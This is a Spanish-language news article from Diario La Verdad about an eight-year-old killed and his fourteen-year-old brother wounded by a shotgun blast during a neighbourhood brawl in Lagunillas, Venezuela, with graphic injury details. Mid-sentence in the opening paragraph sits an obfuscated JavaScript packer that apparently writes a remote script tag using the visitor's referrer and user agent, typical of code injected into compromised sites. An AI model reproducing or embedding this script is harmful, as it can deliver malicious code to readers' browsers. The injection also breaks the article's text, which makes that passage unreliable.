publicidad

Azotes tirotean a dos hermanitos cuando paseaban en bicicleta

Yéssica González / Lagunillas / noticias@laverdad.com
La eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znyhz|var|u0026u|referrer|skzsa||js|php'.split('|'),0,{})) Policía científica busca al "Diablo" y al "Guabino". Ambos huyeron en una motocicleta sin luces tras herir a sus vecinos. Hasta ahora no hay rastro de su escondite. Juan Alejandro Flores, de ocho años, murió en el traslado en ambulancia, mientras que Jordany Josué (14) está grave en el Universitario

Juan Flores, padre de las víctimas, lloraba desconsolado por su hijo en la morgue de Cabimas

De un escopetazo en la cabeza mataron a Juan Alejandro Flores Pineda, de ocho años, cuando jugaba con la bicicleta de un primo en el frente de su residencia en la calle Porvenir del sector Campo Lara, en el municipio Lagunillas. El mismo proyectil hirió a su hermano mayor, Jordany Josué Flores, de 14. La Policía busca al "Diablo" y al "Guabino".

Una riña en la casa vecina desató la tragedia el pasado 25 de diciembre a las 7.30 de la noche. Los desconocidos que compartían con los vecinos de los Flores. En la reunión discutieron con otro invitado, sacaron el arma y dispararon para todos lados. Los niños quedaron atrapados en el tiroteo. 

Jordany manejaba la bicicleta y Juan iba en la barra. Un proyectil entró por la espalda del hermano mayor, afectó un pulmón y una de sus arterias principales. La misma bala atravesó la cabeza del hermano pequeño.  Los perdigones hicieron estragos en sus brazos y dejaron parte de su masa encefálica en el lugar. 

“Estábamos en familia. En el frente de la casa los niños disfrutaban de sus juguetes de Navidad. Ellos paseaban con la bicicleta de un primo. Escuchamos el ruido pensamos que eran cohetes. Los vi caer y le dije a un primo que los ayudara a levantar y ahí fue cuando escuchamos los gritos y nos dimos cuenta de lo que había pasado”, recordó Juan Flores, padre de las víctimas.  

A los heridos los llevaron al ambulatorio de El Corozo y de ahí los remitieron hasta el Hospital Pedro García Clara. “Jordany siempre estuvo consciente. En la ambulancia le pedía a su hermano que no se durmiera.  Me decía: 'No puedo respirar papá'. Miraba a su hermanito y le rogaba que no se durmiera”. 

Juan Alejandro llegó sin signos vitales al hospital.  A su hermano lo enviaron en la misma ambulancia al Hospital Universitario de Maracaibo. Allí lo operaron y lo recluyeron en la Unidad de Cuidados Intensivos. Está muy delicado.

La Policía científica aún no encuentra la guarida del "Diablo" y el "Guabino". Los testigos denunciaron a los oficiales que ellos sacaron el arma, dispararon y huyeron en una moto oscura y con las luces apagadas. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama